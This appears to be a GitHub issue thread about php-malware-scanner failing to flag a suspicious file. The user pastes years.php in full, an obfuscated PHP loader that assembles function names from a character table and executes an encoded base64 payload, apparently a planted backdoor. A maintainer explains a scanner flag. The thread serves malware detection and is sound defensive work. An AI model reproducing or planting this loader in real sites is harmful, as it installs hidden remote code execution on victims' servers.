Base64 ? long weird string ? not detected in a file years.php at the root of the web folder of the domain

[progz]

Hello,

First, thanks for your work, it's very useful.

I'm trying to understand why php-malware-scanner do not find that file when I do a scan. php-malware-scanner is up-to-date.

server:/usr/local/bin/php-malware-scanner# cat /var/www/xXxXxXxXxX.org/years.php 
<?php $cdFUXoVtM='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$cdFUXoVtM[(105/15)].$cdFUXoVtM[(26-1)].$cdFUXoVtM[(1*49)].$cdFUXoVtM[((10*1)+18)].$cdFUXoVtM[(14+22)].$cdFUXoVtM[(44+5)].$cdFUXoVtM[(44-13)].$cdFUXoVtM[(684/18)].$cdFUXoVtM[(23+4)].$cdFUXoVtM[(72-(33-7))].$cdFUXoVtM[(154/22)].$cdFUXoVtM[(11+25)].$cdFUXoVtM[(65-(62-31))].$cdFUXoVtM[(26-6)].$cdFUXoVtM[((27*2)-8)];$pHFdNhg9688=$cdFUXoVtM[(20-9)].$cdFUXoVtM[(2*4)].$cdFUXoVtM[(29*1)].$cdFUXoVtM[(160/4)];$MYtraky2482=$cdFUXoVtM[(8*5)].$cdFUXoVtM[((1+0)+2)].$cdFUXoVtM[(6+(1*(95/19)))].$cdFUXoVtM[(140/5)].$cdFUXoVtM[(522/18)].$cdFUXoVtM[(7*((7-3)-2))].$cdFUXoVtM[(2*14)].$cdFUXoVtM[(138/(2+4))].$cdFUXoVtM[(1029/(378/18))].$cdFUXoVtM[((2*189)/9)].$cdFUXoVtM[(12+(0+0))].$cdFUXoVtM[(31*1)].$cdFUXoVtM[(48/(36/12))].$cdFUXoVtM[(735/15)].$cdFUXoVtM[(0+7)].$cdFUXoVtM[(18+2)].$cdFUXoVtM[(18-(10/5))].$cdFUXoVtM[(735/15)].$cdFUXoVtM[(0+(2-(1*1)))].$cdFUXoVtM[(16-(3+(36/(0+18))))].$cdFUXoVtM[((167-23)/18)].$cdFUXoVtM[(0+(18-9))].$cdFUXoVtM[(1*3)].$cdFUXoVtM[(11*(1+(0/(78/13))))].$cdFUXoVtM[(2*7)].$cdFUXoVtM[(29*(0+1))].$cdFUXoVtM[(38-(8+9))].$cdFUXoVtM[(15*2)].$cdFUXoVtM[(45-11)].$cdFUXoVtM[(1*46)].$cdFUXoVtM[(1*(17+21))].$cdFUXoVtM[(78/3)].$cdFUXoVtM[(21+(77/11))].$cdFUXoVtM[(22+14)].$cdFUXoVtM[(343/(91/13))].$cdFUXoVtM[(1*1)].$cdFUXoVtM[(21-10)].$cdFUXoVtM[(22+(12/2))].$cdFUXoVtM[(180/20)].$cdFUXoVtM[(3+((0+0)*1))].$cdFUXoVtM[(686/(126/9))].$cdFUXoVtM[(61-(32-8))].$cdFUXoVtM[(476/17)].$cdFUXoVtM[((4-0)+22)].$cdFUXoVtM[(((23-(2*5))/13)-0)].$cdFUXoVtM[(7+(84/21))].$cdFUXoVtM[(28/2)].$cdFUXoVtM[(9-0)].$cdFUXoVtM[(3*1)];$UrR1094= "'vVRNb9NAED0Hif+wtaLGkdLYTglI5KOlJOVCAg1J1UJR5NqTelvbcb3rJm3VCxIIqQghIQ5ISBxQxQ1OHLjwb5qWf8F6104MNC0nfEg8z2/ezrxZTSrt6g6gCkp379XbTyRXelq6fi2VpuA7E3Q3QsHfxgxdjOB9AS8Gro3dHZlL5aW8Z3lSdsqH/B72AzL9s6PbA92H6QQSEA8MCqagpLFrwrBr9F0KLmW1bQGVJYtS77ai6B7O97BP6FaATcgP9w8UYtkKT5HyvEemSodUaOGejAlh+bzPLJqdRVHHFVTIHjKGoHRN7MvSwJvTTQe7Eicm0KiWv3DsGnZgAmteaKXSRt+E0PtNncDNG10TQkCW1mr1QlMbDJvbS0azvWo02itDhqnNZYbxuBPGWtMeaJzXXg4xLeQ0VllcM8OcMC40tJjTivPURhjXuE4h4vC42X7MsHWVYfON8KztlYpwJpXqYRu6XkBjp8nEAAU7+hYQxcYGuAS4nzn0+2CmqiTvTA5J5QX2ghYjq+QNSXi0wcpAC9WomCOwCQgL2TxmYotFGWN3U85OEs4h9VaxGNVxdJX/Gvcx6f3Ys/WDtVpnnvtmx9if8wm9F95y7GCJ+3qJl5GFPjBH/4eD7Gfi4lWaFxQSCoBh9VGCefri/enzk9Mvr0Yv35Q3/apUiklSWUeWD71KRhF8xl7QVFXV9E1D14tFnQKhejFTRVXxnD37fv750+jjydmH49G34/Ov736+/TF6fVIWDyorevUfziCYgqN7+aFjX6ydIFwm7QBl6mypzMFugPcqGXaQD8TKoMiUSqZQQoFvV65oEClCtxe4BsV9l6+rNEvMHqJwFOl4BOGW5XNhhMRcQmZJLCIkz4zZWRRvFIslGozVxS6mcnRpOMAWW99jhxlWDt3ttO4/eNjusj823rHodGKr3u602A6503y0XG/ltIifLJfnwhCMMDOpZ9h9AhPwiDfqAw18F40F+KX6BQ=='";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Any insight ?

server5:/usr/local/bin/php-malware-scanner# php scan.php -d /var/www/xXxXxXxXxX.org/ -k -w -b -m -x -c -L -p -j 6.1.1
Combined whitelist records count: 88134
# ER 3958870d4cd3e8acf601043cdbc58b0c # {/var/www/xXxXxXxXxX.org/wp-content/themes/Divi/includes/builder/framework.php} #ZpbG # file # 20

Thanks a lot, if you have any clue :)

Best regards, Mr P.

[scr34m]

When you use -b flag then it scans only for specified keys. These patterns sits in the base64_patterns directory. I thunk it's better to run first always with out -b flag and then after if no match try with that one.

[progz]

Indeed, it's way better when I remove -b

Thanks a lot